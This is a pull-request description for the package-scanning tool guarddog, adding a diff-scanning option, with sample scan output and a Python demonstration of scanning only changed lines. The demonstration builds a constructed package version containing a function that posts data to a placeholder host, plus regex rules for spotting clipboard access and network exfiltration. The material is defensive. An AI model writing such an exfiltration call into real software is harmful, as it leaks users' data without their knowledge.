
Add diff scanning option

Open ikretz opened this issue 8 months ago • 0 comments

This PR adds a --diff option to the scan subcommand:

$ guarddog pypi scan requests --diff 2.32.2
$ guarddog npm scan /tmp/axios_1.8.4 --diff /tmp/axios_1.8.3.tar.gz

This will perform source code analysis only on the code changes that exist between the two selected package versions. Clearly, these results are only meaningful when different versions of the same package are compared.

Example:

$ guarddog pypi scan llm-code-lens --version 0.5.3
Found 3 potentially malicious indicators in llm-code-lens

clipboard-access: found 3 source code matches
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:465
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:477
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:489
        pyperclip.copy(full_message)

$ guarddog pypi scan llm-code-lens --version 0.5.2
Found 3 potentially malicious indicators in llm-code-lens

clipboard-access: found 3 source code matches
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:465
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:477
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:489
        pyperclip.copy(full_message)

$ guarddog pypi scan llm-code-lens --version 0.5.3 --diff 0.5.2
Found 0 potentially malicious indicators scanning llm-code-lens

Diff scanning is available for the PyPI, npm and Go ecosystems. There are no plans to try to extend it to GitHub Actions.

The PR also adds and updates tests to accommodate the new feature and updates all dependencies to their latest compatible versions.

ikretz, Apr 07 '25 10:04
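To make concrete what "source code analysis only on the code changes" means in practice, here is an added example that is not guarddog's own code and does not use its internal API. It models two versions of a package as in-memory file trees (constructed, loosely shaped after the llm-code-lens output above but not its real source), computes the lines that were added or changed between them with difflib, and runs a pair of hypothetical regex rules (`clipboard-access`, `network-exfiltration`, standing in for guarddog's Semgrep rules) either over every line (a normal scan) or only over the added lines (a diff scan). The constructed 0.5.3 tree adds a network call to the same file that already had the clipboard access, which is exactly the case diff scanning is meant to surface.

```python
import difflib
import re
from dataclasses import dataclass

# Constructed sample package trees (path -> file content).
# These are NOT the real llm-code-lens sources; they only mimic the shape
# of the findings shown in the PR description.
OLD_VERSION = {
    "llm_code_lens/__init__.py": "__version__ = '0.5.2'\n",
    "llm_code_lens/cli.py": (
        "import pyperclip\n"
        "\n"
        "def copy_summary(full_message):\n"
        "    pyperclip.copy(full_message)\n"
    ),
}

NEW_VERSION = {
    "llm_code_lens/__init__.py": "__version__ = '0.5.3'\n",
    "llm_code_lens/cli.py": (
        "import pyperclip\n"
        "import urllib.request\n"
        "\n"
        "def copy_summary(full_message):\n"
        "    pyperclip.copy(full_message)\n"
        "\n"
        "def phone_home(full_message):\n"
        "    urllib.request.urlopen('http://example.invalid/', data=full_message.encode())\n"
    ),
}

# Hypothetical line-level rules. guarddog uses Semgrep rules for this; the
# regexes here are placeholders so the example runs offline.
RULES = {
    "clipboard-access": re.compile(r"\bpyperclip\.(copy|paste)\("),
    "network-exfiltration": re.compile(r"\burllib\.request\.urlopen\("),
}


@dataclass(frozen=True)
class Finding:
    rule: str
    path: str
    line: int
    code: str


def _match_rules(path, lineno, line):
    """Apply every rule to a single line and return the findings it produces."""
    return [
        Finding(rule, path, lineno, line.strip())
        for rule, pattern in RULES.items()
        if pattern.search(line)
    ]


def full_scan(tree):
    """Normal scan: every rule over every line of every file in the tree."""
    findings = []
    for path, content in sorted(tree.items()):
        for lineno, line in enumerate(content.splitlines(), start=1):
            findings.extend(_match_rules(path, lineno, line))
    return findings


def added_lines(old_tree, new_tree):
    """Yield (path, lineno, line) for lines that exist in new_tree but not in old_tree.

    A file absent from old_tree counts as entirely new. Deleted lines are
    ignored: code that is no longer in the package cannot execute.
    """
    for path, new_content in sorted(new_tree.items()):
        old_lines = old_tree.get(path, "").splitlines()
        new_lines = new_content.splitlines()
        matcher = difflib.SequenceMatcher(a=old_lines, b=new_lines, autojunk=False)
        for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
            if tag in ("insert", "replace"):
                for j in range(j1, j2):
                    yield path, j + 1, new_lines[j]


def diff_scan(old_tree, new_tree):
    """Diff scan: the same rules, but only over lines added or changed since old_tree."""
    findings = []
    for path, lineno, line in added_lines(old_tree, new_tree):
        findings.extend(_match_rules(path, lineno, line))
    return findings


if __name__ == "__main__":
    for label, result in [
        ("full scan 0.5.2", full_scan(OLD_VERSION)),
        ("full scan 0.5.3", full_scan(NEW_VERSION)),
        ("diff scan 0.5.3 vs 0.5.2", diff_scan(OLD_VERSION, NEW_VERSION)),
    ]:
        print(f"{label}: {len(result)} finding(s)")
        for f in result:
            print(f"  {f.rule} at {f.path}:{f.line}  {f.code}")
```

Two properties of this approach are worth keeping in mind when reading diff-scan output. First, a finding that is present in both versions is suppressed by construction, so a clean diff scan says nothing about the baseline; the 0.5.2 clipboard access in the example is still there in 0.5.3, it just is not new. Second, the comparison is line-based: an edit that merely touches a line containing a pre-existing indicator will re-report it, and an indicator that moved to a different file will appear as new in that file. Diff scanning is a triage aid for reviewing an upgrade whose previous version you already trust, not a replacement for a full scan of a package you have never looked at.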